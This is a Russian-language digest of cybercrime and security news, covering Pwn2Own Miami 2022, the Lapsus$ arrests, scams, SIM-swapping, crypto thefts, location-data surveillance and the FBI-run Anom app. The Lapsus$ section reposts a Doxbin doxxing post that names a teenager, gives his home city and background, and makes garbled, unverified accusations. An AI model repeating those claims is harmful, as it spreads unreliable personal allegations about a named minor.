В июне центральный банк Афганистана, возглавляемый представителями талибов, запретил онлайн-торговлю иностранной валютой. Представитель ЦБ сообщил, что регулятор считает торговлю на рынке Форекс незаконной и мошеннической, а в исламском законодательстве нет указаний одобрять ее.
Согласно Chainalysis, в 2021 году Афганистан воходил в топ-20 стран Глобального индекса внедрения криптовалют, который отображает распространенность цифровых активов по миру.
В начале 2022 года криптоинвестор и журналист Фархан Хотик (Farhan Hotik) из афганской провинции Забуд сообщил, что на фоне санкций США местные жители все чаще обеспечивают себя всем необходимым для жизни или для эмиграции из страны с помощью цифровых активов.
Арестованные властями Афганистана две недели назад 16 руководителей местных
торговых площадок и обменников были отпущены на свободу.
Всех бизнесменов обязали прекратить операции, связанные с криптовалютами, сообщил директор одной из афганистанских криптобирж. Он добавил, что руководители не получали предварительного предупреждения и понятия не имели, что талибы запретили криптоактивы.
«Они арестовали нас, чтобы сказать, что мы не можем продолжать нашу деятельность», — сообщил он.
Слухи о том, что талибы конфисковали активы, которые находились на закрытых торговых площадках, не являются правдивыми, заявил директор одной из бирж. Между тем, талибы ввели запрет на криптовалюты еще три месяца назад. Глава отдела по борьбе с преступностью полиции Герата Сайед Шах Саадат (Sayed Shah Sa’adat) заявил, что Центральный банк Афганистана (DAB) призвал ограничить использование криптовалют:
«Торговля цифровыми валютами вызвала множество проблем и является мошенничеством, поэтому биржи должны быть закрыты. Мы задержали всех владельцев обменников, вовлеченных в этот бизнес, и закрыли их площадки».
Впрочем, головные офисы четырех криптовалютных бирж Герата возобновили свою работу. В других провинциях Афганистана торговые платформы тоже продолжили свою деятельность, признался один из сотрудников криптобиржи в Кабуле.
Знаменитый конкурс для хакеров Pwn2Own, проходивший в этом году в Майами, принёс участникам 400 тысяч долларов за разработку и демонстрацию 26 эксплойтов, которые потенциально могут использоваться в атаках на продукты АСУ ТП и SCADA.
В ходе исследований специалисты пытались атаковать целый спектр категорий: командный сервер, сервер OPC UA, шлюз к данным и человеко-машинный интерфейс (Human-Machine Interface, HMI).
«Всем ещё раз огромное спасибо, что приняли участие в Pwn2Own. Также выражаем благодарность вендорам за сотрудничество и за устранение уязвимостей, выявленных специалистами», — объявили организаторы конкурса.
К слову, вендорам дали 120 дней на выпуск патчей, по истечении которых представители Trend Micro Zero Day Initiative (ZDI) раскроют технические подробности обнаруженных багов.
Победителями конкурса стали Даан Кёпер (@daankeuper) и Таис Алкемейд (@xnyhps) из Computest Sector 7 (@sector7_nl). В первый день они заработали 20 тысяч долларов после того, как выполнили код на сервере SCADA Inductive Automation Ignition с помощью бреши в процессе аутентификации.
Позже в этот же день они получили ещё $20 тыс. за уязвимость бесконтрольного поиска пути, которая привела к удалённому выполнению кода в софте AVEVA Edge HMI / SCADA. Второй день отметился для Computest Sector 7 успешной DoS-атакой на демосервер Unified Automation C++ (заработали $5000).
После этого команде удалось обойти проверку доверенных приложений в OPC Foundation OPC UA .NET, что принесло ей $40 000. Таким образом, Computest Sector 7 заняла первую строчку, за ней идёт Incite Team, а замыкает тройку лидеров Claroty Research.
Trend Micro Zero Day Initiative (ZDI) в период с 19 по 21 апреля в Майами- Саут-Бич провели ежегодный Pwn2Own Miami 2022.
По итогу мероприятия участники заработали 400 000 долларов США за демонстрацию 26 эксплойтов нулевого дня, нацеленных на продукты ICS и SCADA в нескольких производственных категориях: сервер управления, сервер унифицированной архитектуры OPC (OPC UA), шлюз данных и человеко-машинный интерфейс (HMI). В ходе первого выпуска Pwn2Own Miami на тему ICS в январе 2020 года участники показали 24 уникальные 0-day, заработав 280 000 долларов США.
Победителями Pwn2Own Miami 2022 стали Даан Кеупер и Тийс Алкемаде из Computest Sector 7.
В первый день хакеры заработали 20 000 долларов СШАА после выполнения кода на сервере управления Inductive Automation Ignition SCADA, используя уязвимость аутентификации. В тот же день участникам удалось проэкслуатировать уязвимость неконтролируемого пути поиска для удаленного выполнения кода (RCE) в программном обеспечении AVEVA Edge HMI/SCADA, заработав 20 000 долларов США.
На второй день Computest Sector 7 воспользовался бесконечным циклом, активировав состояние DoS в отношении Unified Automation C++ Demo Server, за что заработал 5000 долларов США.
Также команда обошла проверку надежных приложений в стандарте OPC Foundation OPC UA .NET и добавила еще 40 000 долларов в свой призовой фонд. По итогу они выиграли титул Master of Pwn, заработав в общей сложности 90 000 долларов за три дня конкурса и заняв первое место в таблице лидеров с 90 очками.
Теперь в распоряжении разработчиков и поставщиков систем 120 дней на выпуск исправлений, пока ZDI не раскроет их публично.
• Source: <https://www.zerodayinitiative.com/blog/2022/4/14/pwn2own- miami-2022-results>
[EN]
Hello, Yet another update to lapsus. I Know this maybe a repetive thread but it's the last update I will share about the matter. Thanks to Doxbin Lapsus$ was shut down, However we did put our efforts to stop this person. Given I was a victim of this idiot's reckless behavior & some of my friends could've been killed if a website admin agreed to sell their website to Mr. Kurtaj which he would've used for furthering his DDoS Attacks on whatever. Lapsus$ better known as "White" & "Breachbase" is a 16 year old living in Oxford in the United Kingdom. However this 16 year old began his career a few years ago being part of another group which is generally disolved with Brian Krebs posting on his blog about the group's name. They specialized in swatting & Sim-swapping attacks. (Which is essentially social engineering telecom companies to replace sim cards of an individual and give them to the attacker who then cashes out bank accounts, Coin base and other accounts). However these attacks were used in things Like Okta, NVIDIA, Microsoft, Samsung and Vodaphone. However this isn't the first time he was arrested. Lapsus$ who is really known as "Arion Kurtaj" is an Albanian Immigrant who moved to the United Kingdom for unknown reasons. He was arrested on December 1st, 2021 in relation to "Lapsus$" He was quickly released. However he was then again arrested in March, Released.... Finally April 4th 2022. The news broke:" UK police arrest 2 suspects in relation to Lapsus$..... A 16 and 17 year old where arrested"
10/04/2022: The UK Ministry of health confirms the Doxbin post:
"White" was crucial and helped lead to an
arrest of a 16 year old who ran @lapsusjobs on telegram. An additional note
was written by what seems to be either KT or Vile:
**"**kt has obtained full chat export of the Lapsus$ Telegram admin chat,
filled with thousands of messages; to which we can confirm White had complete
control over the @LapsusJobs Telegram account, along with much more
information surrounding current/future attacks "
Shortly after: one of lapsus$'s members targeted a children's hospital
Arion was arrested on April 1st & Tried the same day.
He was charged with:
- Three counts of unauthorized access to a computer with intent to impair the
reliability of data.
- One count of fraud by false representation.
- One count of unauthorized access to a computer with intent to hinder access
to data.
- One count of causing a computer to perform a function to secure
unauthorized access to a program
Здравствуйте! Еще одно обновление для lapsus. Я знаю, что это может быть повторяющаяся тема, но это последнее обновление, которым я поделюсь по этому вопросу. Благодаря Doxbin Lapsus$ был закрыт, однако мы приложили все усилия, чтобы остановить этого человека. Учитывая, что я стал жертвой безрассудного поведения этого идиота, и некоторые из моих друзей могли быть убиты, если бы администратор веб-сайта согласился продать их веб-сайт г-ну Куртаю, который он бы использовал для продвижения своих DDoS-атак на что угодно. Lapsus$, более известный как «White» и «Breachbase», — 16-летний парень, живущий в Оксфорде, Великобритания. Однако этот 16-летний юноша начал свою карьеру несколько лет назад, будучи частью другой группы, которая, как правило, распалась после того, как Брайан Кребс опубликовал в своем блоге название группы. Они специализировались на атаках с подменой симов. (Что, по сути, является социальной инженерией телекоммуникационных компаний для замены сим-карт человека и передачи их злоумышленнику, который затем обналичивает банковские счета, базу монет и другие счета). Однако эти атаки использовались в таких вещах, как Okta, NVIDIA, Microsoft, Samsung и Vodaphone. Однако это не первый его арест. Lapsus$, который на самом деле известен как «Arion Kurtaj», является иммигрантом из Албании, который переехал в Соединенное Королевство по неизвестным причинам. Он был арестован 1 декабря 2021 года в связи с «Lapsus$». Его быстро отпустили. Однако затем он был снова арестован в марте, освобожден.... Наконец, 4 апреля 2022 года. Секретные новости:«Полиция Великобритании арестовала двух подозреваемых в отношении Lapsus$.. ... Арестованы 16-ти и 17-ти летние"
04.10.2022: Министерство здравоохранения Великобритании подтверждает, что
сообщение Doxbin: «Белый» имело решающее
значение и помогло арестовать 16-летний парень, который руководил @lapsusjobs
в телеграмме. Дополнительная заметка была написана кем-то вроде КТ или Вайла:
**"**kt получил полный экспорт чата административного чата Lapsus$ Telegram,
заполненный тысячами сообщений; на что мы можем подтвердить, что Уайт имел
полный контроль над учетной записью Telegram @LapsusJobs , а также гораздо
больше информации о текущих/будущих атаках "
Вскоре после этого: один из членов lapsus$ напал на детскую больницу
Ариона арестовали 1 апреля и судили в тот же день.
Ему было предъявлено обвинение в:
- Три случая несанкционированного доступа к компьютеру с целью снижения
достоверности данных.
- Один пункт мошенничества путем предоставления ложных сведений.
- Один случай несанкционированного доступа к компьютеру с целью сокрытия
доступа к данным.
- Один случай принуждения компьютера к выполнению функции по защите
несанкционированного доступа к программе.
Мошенники придумали способ постоянной слежки за пользователями ПК
Хакеры освоили постоянную слежку за компьютерами через видеокарту ради сбора данных
Киберпреступники научились следить за владельцами персональных компьютеров при
помощи видеокарт, пишет портал Bleeping Computer.
Группа исследователей из французских, израильских и австралийских
университетов проанализировала работу 2550 устройств с 1605 различными
конфигурациями центрального процессора и обнаружили, что хакеры могут собрать
176 различных показателей видеокарт.
Эксперты объясняют появление такого способа выманить данные законами, направленными на получение согласия на активацию куки-файлов веб-сайта. Недобросовестные сайты начали собирать информацию о конфигурации оборудования, ОС, часовом поясе, разрешении экрана, языке, шрифтах и так далее. С помощью Web Graphics Library — программного интерфейса приложения для рендеринга 3D-графики — мошенникам удается отследить устройство по уникальному следу.
Исследователи заявили, что сообщили крупным компаниям, производящим
электронные устройства, о результатах работы. "Мы поделились предварительной
версией нашей статьи с Intel, ARM, Google, Mozilla и Brave в течение июня —
июля 2020-го и продолжали делиться с ними нашими достижениями в течение
2020-2021 годов. В ответ на раскрытие информации Khronos Group, ответственная
за спецификацию WebGL, создала техническую исследовательскую группу для
обсуждения раскрытия информации с поставщиками браузеров и другими
заинтересованными сторонами", — уточнили они.
Ранее американская газета The Washington Post сообщила, что программное
обеспечение израильской фирмы NSO Group, использовавшееся спецслужбами для
отслеживания преступников и террористов, задействовали для слежки за
активистами, журналистами и оппозиционерами по всему миру. Среди них —
репортеры канала CNN, агентств Ассошиэйтед Пресс и Блумберг, американских
газет The Wall Street Journal, The New York Times, французской Le Monde и
других изданий.
Каждый по-своему проводит зимние каникулы. Кто-то ездит в гости, кто-то закупается всячиной, кто-то доедает салаты. Знаменитая 0xEMPRESS решила поступить иначе — и мимоходом одолела защиту Watch Dogs Legion.
Как стало известно благодаря посту на форуме Reddit, работа над взломом всё ещё не закончена: хотя всё в целом готово, 0xEMPRESS нужна подмога с бета- тестированием. Как обычно, девушка публично попросила о помощи — а это значит, что релиз пиратской Watch Dogs Legion уже не за горами. Защита продержалась более года.
Напомним, что Watch Dogs Legion вышла 29 октября 2020 года. К сожалению, многообещающий хакерский экшен не особо приглянулся публике: что критики, что простые геймеры встретили новинку весьма прохладно и быстро переключились на куда более успешную Assassin’s Creed Valhalla.
Состоялся релиз эталонной реализации криптографической хеш-функции BLAKE3 1.0, примечательной очень высокой производительностью вычисления хеша при обеспечении надёжности на уровне SHA-3. В тесте на генерацию хеша для файла, размером 16 КБ, BLAKE3 с 256-битным ключом опережает SHA3-256 в 17 раз, SHA-256 - в 14 раз, SHA-512 - в 9 раз, SHA-1 - в 6 раз, а BLAKE2b - в 5 раз. Значительный отрыв сохраняется и при обработке очень больших объёмов данных, например, BLAKE3 оказался быстрее SHA-256 в 8 раз при вычислении хеша для 1ГБ случайных данных. Код эталонной реализация BLAKE3 поставляется в вариантах на языках Си и Rust под двойной лицензией - общественное достояние (CC0) и Apache 2.0.
Хэш-функция рассчитана на такое применение, как проверка целостности файлов, аутентификация сообщений и формирование данных для криптографических цифровых подписей. BLAKE3 не предназначена для хеширования паролей, так как нацелена на максимально быстрое вычисление хешей (для паролей рекомендуется использовать медленные хеш-функции yescrypt, bcrypt, scrypt или Argon2). Рассматриваемая хеш-функция нечувствительна к размеру хешируемых данных и защищена от атак по подбору коллизий и нахождению прообраза.
Алгоритм разработан известными специалистами по криптографии (Jack O'Connor, Jean-Philippe Aumasson, Samuel Neves, Zooko Wilcox-O'Hearn) и продолжает развитие алгоритма BLAKE2 и применяет для кодирования дерева цепочек блоков механизм Bao. В отличие от BLAKE2 (BLAKE2b, BLAKE2s), в BLAKE3 для всех платформ предложен единый алгоритм, не привязанный к разрядности и размеру хеша.
Повышения производительности удалось добиться благодаря сокращению числа раундов с 10 до 7 и раздельному хешированию блоков кусочками по 1 Кб. По заявлению создателей, они нашли убедительное математическое доказательство, что можно обойтись 7 раундами вместо 10 при сохранении того же уровня надёжности (для наглядности можно привести пример с перемешиванием фруктов в миксере - через 7 секунд фрукты уже полностью перемешаны, и дополнительные 3 секунды не скажутся на консистенции смеси). При этом некоторые исследователи выражают сомнение, полагая, что даже если в настоящее время 7 раундов достаточно для противостояния всем известным атакам на хеши, то дополнительные 3 раунда могут оказаться полезны в случае выявления новых атак в будущем.
Что касается разделения на блоки, то в BLAKE3 поток разбивается на кусочки по 1 Кб и каждый кусочек хешируется независимо. На основе хешей кусочков на базе бинарного дерева Меркла формируется один большой хеш. Указанное разделение позволяет решить проблему с распараллеливанием обработки данных при вычислении хеша - например, можно использовать 4-поточные SIMD-инструкции для одновременного вычисления хешей 4 блоков. Традиционные хеш-функции SHA-* обрабатывают данные последовательно.
Особенности BLAKE3:
• Высокая производительность, BLAKE3 значительно быстрее MD5, SHA-1, SHA-2, SHA-3 и BLAKE2.
• Безопасность, в том числе стойкость к атаке удлинением сообщения, которой подвержен SHA-2.
• Доступны варианты на языке Rust, оптимизированные для использования инструкций SSE2, SSE4.1, AVX2, AVX-512 и NEON.
• Обеспечение распараллеливания вычислений на любое число потоков и SIMD- каналов.
• Возможность инкрементального обновления и верифицированной обработки потоков.
• Применение в режимах PRF, MAC, KDF, XOF и как обычный хеш.
• Единый алгоритм для всех архитектур, быстрый как на системах x86-64, так и на 32-разрядных процессорах ARM.
Основные отличия BLAKE3 от BLAKE2:
• Использование бинарной древовидной структуры, позволяющей добиться неограниченного параллелизма при вычислении хеша.
• Сокращение числа раундов с 10 до 7.
• Три режима работы: хеширование, хеширование с ключом (HMAC) и формирование ключа (KDF).
• Отсутствие дополнительных накладных расходов при хешировании с ключом за счёт использования области, ранее занимаемой блоком параметров ключа.
• Встроенный механизм работы в форме функции с удлиняемым результатом (XOF, Extendable Output Function), допускающей распараллеливание и позиционирование (seek).
Следственным управлением УМВД России по Новгородской области завершено расследование уголовного дела о мошенничестве в сети Интернет. Фигурантами по уголовному делу проходят 50-летний житель города Чудово и две 22-летние жительницы города Луга Ленобласти.
Как установлено в ходе предварительного следствия, с 2017 по 2019 годы они размещали на специализированных сайтах «Авито» и «Дром» объявления о продаже автомашин, катеров, жилых домов с земельными участками и других товаров.
Потенциальные покупатели, обнаружив объявление, созванивались по указанному в нём номеру телефона для обсуждения условий сделки. При этом злоумышленники, представляясь собственниками предложенного к продаже имущества, под различными вымышленными предлогами просили покупателя внести на банковскую карту предоплату. После поступления денежных средств «продавцы» прекращали общение с покупателями, а деньги обналичивали. Размер предоплаты при этом варьировался от 5 до почти 300 тысяч рублей.
Таким незаконным способом фигуранты уголовного дела смогли заполучить более 1 миллиона 150 тысяч рублей. От действий мошенников пострадали жители Московской, Саратовской, Владимирской, Рязанской, Иркутской, Ярославской, Хабаровской областей, Приморского, Ставропольского, Забайкальского краев, а также ряда других регионов России.
В ходе следствия фигурантам предъявлено обвинение в 27 фактах мошенничества в крупном размере и мошенничестве, совершённом группой лиц по предварительному сговору.
В настоящее время уголовное дело направлено в Чудовский районный суд для рассмотрения по существу.
В современных условиях цифровая слежка становится мощным инструментом для государственных структур, позволяя отслеживать передвижения людей с высокой точностью. Пример компании Fog Data Science показывает, как личные данные, включая посещаемые медицинские учреждения, могут использоваться для наблюдения за объектами интереса.
Fog Data Science предоставляет государственным и местным органам власти инструмент Fog Reveal , который использует данные, собранные с мобильных телефонов. Эти данные собираются через рекламные сети и приложения и включают информацию о геолокации устройств. Компании удаётся удерживать низкую стоимость своих услуг: менее $10,000 в год для местных органов власти, таких как шерифы и дорожные патрули. Это делает её доступной даже для небольших агентств.
В документе, полученном из переписки с правоохранительными органами штата Джорджия, содержится форма запроса, в которой полиция должна указать:
Эти данные позволяют компании сузить круг поиска до определённых устройств, которые регулярно появляются в указанных местах. Затем правоохранительные органы могут отслеживать передвижения этих устройств по другим локациям.
Особую тревогу вызывает запрос адресов врачей и медицинских учреждений, которые могут быть использованы для отслеживания людей, посещающих клиники репродуктивного здоровья. В условиях пост-Roe Америки, где доступ к абортам стал ограничен, такие инструменты могут быть использованы для слежки за женщинами, пересекающими границы штатов для получения медицинской помощи. Это вызывает значительные опасения среди защитников конфиденциальности.
В прошлом аналогичные случаи уже вызывали общественный резонанс. Например, в 2022 году компания Safegraph прекратила продажу данных о посещении клиник, включая Planned Parenthood, после расследований, показавших, как можно было проследить, откуда приезжают посетители, как долго они находятся в учреждении и куда отправляются после этого.
Однако другие компании, такие как Babel Street и её инструмент Locate X, продолжают предоставлять доступ к данным для отслеживания передвижений людей, включая их посещения абортных клиник.
Недавно Федеральная торговая комиссия (FTC) ввела запрет для компаний Venntel и Gravy Analytics на продажу данных о посещении медицинских учреждений, приютов и религиозных объектов. Однако этот шаг не устраняет существующую проблему. Компании, такие как Fog Data Science, остаются в зоне серого регулирования, продолжая предоставлять дешёвые и доступные инструменты для слежки.
Кроме того, из переписки компании с правоохранительными органами стало известно, что данные Fog могут пересекаться с базами Venntel, что указывает на взаимосвязанность таких компаний и масштаб их деятельности.
Использование медицинских данных для слежки ставит под сомнение этические стандарты как компаний, так и правоохранительных органов. Проблема становится особенно острой в условиях, когда люди могут подвергаться преследованию за посещение определённых мест, будь то клиники репродуктивного здоровья или религиозные объекты.
С одной стороны, эти данные помогают в расследовании преступлений, таких как торговля людьми. С другой стороны, они нарушают права граждан на конфиденциальность и свободу передвижения.
Source:<https://www.404media.co/location-data-firm-offers-to-help-cops- track-targets-via-doctor-visits/>
Шан Хейнс: от уважаемого банкира до преступника за несколько месяцев.
В маленьком городке Элкхарт, штат Канзас, разразился финансовый скандал, потрясший всю местную общину. Бывший генеральный директор банка Heartland Tri- State Шан Хейнс приговорен к 24 годам и 5 месяцам тюремного заключения за хищение 47 миллионов долларов. Мужчина стал жертвой криптовалютной аферы типа pig butchering (разделка свиней).
53-летний Хейнс попал в ловушку мошенников в конце 2022 года. Злоумышленники, чьи личности до сих пор не установлены, убедили его инвестировать в якобы законную виртуальную валюту. Общение велось через мессенджер WhatsApp. Начав с вложения личных средств, Хейнс вскоре перешел к хищению денег из различных источников, включая местную церковь, инвестиционный клуб и даже счет своей дочери для оплаты колледжа.
Самый большой ущерб Хейнс нанес банку Heartland Tri-State. С мая по июль 2023 года он осуществил 11 транзакций на общую сумму 47 миллионов долларов на счета, контролируемые мошенниками. Чтобы осуществить эти операции, Хейнс лгал сотрудникам, старался обойти установленные правила и лимиты на переводы.
Действия банкира привели к катастрофическим последствиям для Элкхарта. Многие акционеры банка потеряли значительную часть своих пенсионных накоплений. Некоторые из них теперь с трудом могут позволить себе оплачивать даже базовые потребности, например уход в доме престарелых.
Брайан Митчелл, бывший сосед Хейнса и местный предприниматель, рассказал о разговоре с обвиняемым 5 июля 2023 года. Хейнс попросил у него ссуду в 12 миллионов долларов, чтобы «активировать» уже переведенные мошенникам средства. Несмотря на предупреждения Митчелла о том, что он стал жертвой обмана, Хейнс в течение следующих двух дней перевел аферистам еще 12,4 миллиона долларов.
Крах банка Heartland Tri-State был неизбежен. 28 июля 2023 года Канзасское управление банковского комиссара закрыло финансовое учреждение, и его взяла под контроль Федеральная корпорация по страхованию вкладов (FDIC). Несмотря на то, что акционеры банка остались ни с чем, вкладчики, к счастью, свои деньги не потеряли.
justice[.]gov/usao-ks/pr/former-ceo-failed-bank-sentenced-prison
Сотрудники УБК ГУ МВД России по Московской области совместно с коллегами из МУ МВД России «Раменское» задержали 18-летнего уроженца Владимирской области. Он подозревается в оказании содействия телефонным мошенникам с Украины.
«В отдел полиции от местной жительницы поступило заявление о том, что ей на смартфон позвонил мужчина, который представился сотрудником одного из операторов мобильной связи. Он сообщил о необходимости продления договора на оказание услуг. Для этого якобы было нужно продиктовать код из поступившего на телефон смс-сообщения.
После того как женщина выполнила требование, ей пришло электронное письмо о взломе личного кабинета на портале Госуслуг. В сообщении был указан телефон горячей линии. Позвонив по нему, гражданка была переадресована на номер афериста, который представился сотрудником ЦБ РФ. Он убедил ее пойти к банкомату и перевести деньги на определенные расчетные счета. Ущерб составил свыше 1 млн 200 тысяч рублей», – рассказала официальный представитель МВД России Ирина Волк.
Следователем МУ МВД России «Раменское» возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ.
«В результате оперативно-розыскных мероприятий полицейские установили абонентские устройства и место активации сим-карт, с которых заявительнице звонили мошенники. На основании полученных данных сотрудники полиции провели обыск в одной из комнат общежития города Москвы, где проживал приезжий из Владимирской области. Обнаружены и изъяты мобильные телефоны, планшетный компьютер, ноутбуки, сим-карты различных операторов связи», – сообщила Ирина Волк.
Задержанный признался, что в одном из мессенджеров неизвестный предложил ему подработку – активировать сим-карты и регистрировать виртуальные АТС. Это позволяло делать звонки из-за границы с подменой телефонного номера на российский.
«По оперативной информации, подозреваемый активировал около тысячи сим-карт. Благодаря этому куратор получил возможность звонить с территории Украины гражданам России для дистанционного хищения их денежных средств. Предварительно установлено, что от противоправных действий пострадали не менее 17 жителей Подмосковья», – добавила Ирина Волк.
Фигуранту избрана мера пресечения в виде подписки о невыезде и надлежащем поведении.
18 мая правоохранители Нью-Йорка задержали 23-летнего гражданина Тайваня, который предположительно является владельцем крупнейшего даркнет-маркетплейса по продаже наркотиков Incognito Market.
__https://twitter.com/x/status/1792609791522840998
По данным властей, Руй-Сян Линь известный под никами Pharoah и faro управлял наркомаркетом с октября 2020 по март 2024 года. За это время через площадку было продано не менее 364 кг кокаина, 295 кг метамфетамина и 92 кг МДМА.
С каждого продавца взималось до 5% от покупной цены каждого наркотика. Для облегчения финансовых транзакций у Incognito Market был собственный «банк», который позволял пользователям вносить криптовалюты на свои счета
Совокупный доход Incognito Market превысил $100 млн. Линь также заработал «миллионы долларов» личной прибыли.
В качестве руководителя сайта он «контролировал все его операции, включая сотрудников, поставщиков и клиентов, и имел полномочия по принятию окончательных решений по каждому аспекту».
Линю предъявлены многочисленные обвинения, включая хранение и продажу
наркотиков и рецептурных лекарств, сговор и отмывание денег. Только по одному
из 15 пунктов ему грозит пожизненное заключение.
Напомним, в марте администрация даркнет-маркетплейса Incognito Market
предположительно совершила экзит-скам с хищением «миллионов» в биткоинах и
Monero. Позднее наркомаркет начал вымогать у пользователей $100 до $20 000 под
угрозой публикации имеющихся у него данных.
• Source: https://www.justice[.]gov/usao-sdny...ng-one-largest-illegal- narcotics-marketplaces
• Source: https://www.justice[.]gov/opa/media/1352576/dl
• Source: https://www.justice[.]gov/opa/media/1352571/dl
Предъявлены обвинения группировке сим-свопперов, которая украла у 50 жертв более 400 миллионов долларов. Как говорится в обвинительном заключении, в число пострадавших компаний попали Apple, AT&T, Verizon и T-Mobile.
Лидером сообщества назван житель Чикаго (штат Иллинойс) Роберт Пауэлл (Robert Powell). Его приспешники — Картер Рон (Carter Rohn) и Эмили Эрнандез (Emily Hernandez). Пауэлл, использовавший никнеймы R, R$ и ElSwapo1, наладил подделку документов с помощью принтеров. Позднее, после подмены сим, сообщники выдавали себя за жертв, посещая розничные магазины перечисленных выше компаний.
Больше всего не повезло сотруднику неназванной корпорации, который потерял из- за подмены сим доступ к своему устройству AT&T. С его помощью преступники получили доступ к счетам организации, с которых они выкрали около 400 миллионов долларов. Еще несколько жертв потеряли от 15 тысяч до миллиона долларов. Организатору группировки предъявлены обвинения в заговоре с целью мошенничества с использованием электронных средств связи, а также в заговоре с целью кражи личных данных при отягчающих обстоятельствах и мошенничества с устройствами доступа.
Любопытно, что за последние две недели — это уже не первый случай, когда жертвами силовиков становятся сим-свопперы. Суммарно за это время были арестованы восемь человек.
sc: cdn.arstechnica.net/wp-content/uploads/2024/01/USA-v-Powell-Order-on- Motion-for-Miscellaneous-Relief-1-25-2024.pdf
Как сообщают специалисты компании PeckShield, межсетевая платформа Multichain могла подвергнуться взлому на сумму более $100 млн — аналитики зафиксировали сильный отток капитала из протокола.
Вчера, 6 июля, из смарт-контракта моста Multichain Fantom были выведены 7 214 wETH стоимостью $13,6 млн, 1 024 wBTC стоимостью $31 млн и монеты USDC на сумму $58 млн. Общая стоимость выведенных криптоактивов составила $102 млн.
Кроме того, из смарт-контракта моста Multichain Dogechain вывели $666 000, что составляет более 86% от общего объема депозитов. Из смарт-контракта моста Multichain Moonriver были выведены USDC и USDT на сумму $5 872 661, в результате чего на нем осталось всего около $700 000.
Разработчики Multichain подтвердили факт перевода средств, отметив, что команда проводит расследование. Они призвали пользователей приостановить использование услуг Multichain. Тем временем, аналитическая компания SlowMist считает, что произошедшее — это взлом.
«Похоже, активность прекратилась. Однако из-за того, что несколько мостов были истощены, это больше похоже на взлом, а не на миграцию», — написали специалисты SlowMist.
Ранее в PeckShield подвели итоги взломов за июнь — за прошлый месяц злоумышленникам удалось украсть почти $93 млн в криптовалюте. Всего хакеры совершили 42 взлома. Самым крупным стал взлом криптокошелька Atomic Wallet — из него было украдено криптоактивов на $12 млн.
Полицейские установили, что 29-летний мужчина приобрел в мессенджере «Telegram» специальный бот-аккаунт, чтобы автоматически обрабатывать и отправлять сообщения, в том числе с автоматически сгенерированными фишинговыми ссылками на интернет-сайты.
Для обманывания потенциальных пострадавших фигурант создавал графическую рекламу о предоставлении денежной помощи от благотворительных фондов и организаций, под которую закреплял фишинговую интернет-ссылку.
Как только граждане переходили по этой ссылке и заполняли необходимые поля, злоумышленник сразу получал доступ к их банковским реквизитам и номерам мобильных телефонов, за которыми закреплены банковские счета. После этого мог беспрепятственно выводить чужие деньги на подконтрольные счета.
По предварительной информации, таким образом он успел присвоить более 300 тысяч гривен.
Мошенническую схему разоблачили сотрудники киберполиции Киева совместно со следственным отделом Оболонского райуправления полиции. Поэтому по месту жительства фигуранта правоохранители провели обыски: изъяли компьютерную технику, банковские и SIM-карты, которые использовались в противоправной деятельности.
Мужчине объявили подозрение по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до восьми лет лишения свободы. Процессуальное руководство осуществляет Оболонская окружная прокуратура Киева.
Операторы DeFi-платформы Fintoch, похоже, совершили exit scam и похитили криптовалюту, принадлежавшую их инвесторам, на общую сумму 31,6 млн долларов США.
[Как сообщают СМИ](https://cointelegraph.com/news/project-takes-off- with-31-6m-in-alleged-exit-scam), для многих исчезновение Fintoch не стало большим сюрпризом. Дело в том, что за последние месяцы вокруг платформы произошло сразу несколько скандалов. К примеру, операторы Fintoch утверждали, что проект поддерживает финансовый конгломерат Morgan Stanley, и корпорация была вынуждена опровергнуть эти заявление в редком для нее [пресс- релизе](https://www.morganstanley.com/content/dam/msdotcom/global- offices/pdf/Indonesia/Indonesia_Fintoch_Important_Notice.pdf). В Morgan Stanley заявляли, что Fintoch использовала товарные знаки без какого-либо разрешения, и подчеркивали, что не несут никакой ответственности за сделки с этой компанией.
Кроме того, в Fintoch сообщали, что имеют лицензию Денежно-кредитного управления Сингапура, но там эту информацию оперативно опровергли, а в начале мая и вовсе выпустили официальное предупреждение для инвесторов, выразив сомнения в Fintoch и его руководстве.
Также Fintoch [обвиняли](https://behindmlm.com/mlm-reviews/fintoch-review- boris-ceo-mlm-crypto-ponzi-targeting-asia/) в том, что проект использует изображения наемного актера, чей портрет компания выдавала за фото своего генерального директора на официальном сайте.
Как теперь сообщил блочейн-исследователь ZachXBT, компания скрылась со всеми средствами своих клиентов, которые массово сообщают, что не могут вывести деньги. Также он опубликовал детальные данные с подробным описанием движения похищенных активов.
ZachXBT пишет, что проект Fintoch, предлагавший своим инвесторам ежедневный доход на инвестиции в 1%, всегда был схемой Понци. Теперь же средства инвесторов выведены из сети BNB Chain на несколько адресов в блокчейнах Tron и Ethereum, а затем распределены по разным депозитам на таких биржах, как Binance и Huione.
Опубликована часть кода приложения для обмена зашифрованными сообщениями Anom.
Motherboard опубликовала часть кода приложения для обмена зашифрованными сообщениями Anom, которое тайно управлялось ФБР для отслеживания организованной преступности в глобальном масштабе.
Спецоперация ANOM (AN0M или ΛNØM) (известная как Operation Trojan Shield или Operation Ironside) — совместная работа правоохранительных органов из нескольких стран, проводившаяся в период с 2018 по 2021 год, в ходе которой были перехвачены миллионы сообщений, отправленных через предположительно защищенный смартфон в приложении для обмена сообщениями ANOM. Служба ANOM использовалась преступниками, но вместо обеспечения защищенной связи фактически представляла собой троянского коня, тайно распространяемого Федеральным бюро расследований США и Федеральной полиции Австралии (AFP), что позволило правоохранителям контролировать все коммуникации. Благодаря сотрудничеству с другими правоохранительными органами по всему миру в результате операции было арестовано более 800 подозреваемых, предположительно причастных к преступной деятельности, в 16 странах. Среди арестованных были предполагаемые члены базирующейся в Австралии итальянской мафии, албанской организованной преступности, преступных мотоклубов, наркосиндикатов и других организованных преступных групп.
Код показывает, что сообщения тайно дублировались и отправлялись "призрачному" контакту, который был скрыт в списках контактов пользователей. Призрачный пользователь, в некотором смысле, был агентом ФБР и его партнеров из правоохранительных органов, читающим сообщения организованных преступников во время их общения друг с другом.
[](https://www.securitylab.ru/upload/images/content- img(190).png)
Для отправки мгновенных сообщений приложение использовало протокол XMPP. Кроме того, Anom обеспечивало шифрование сообщений. Контакт внутри XMPP использует специальный дескриптор, который чем-то похож на адрес электронной почты. ФБР внедрило в Anom учётную запись и бот XMPP для поддержки клиентов. Бот был скрыт в списках контактов пользователей Anom и работал в фоновом режиме. На практике приложение прокручивало список контактов пользователя, и когда оно натыкалось на аккаунт бота, приложение отфильтровывало его и скрывало из поля зрения.
[](https://www.securitylab.ru/upload/images/content- img(191).png)
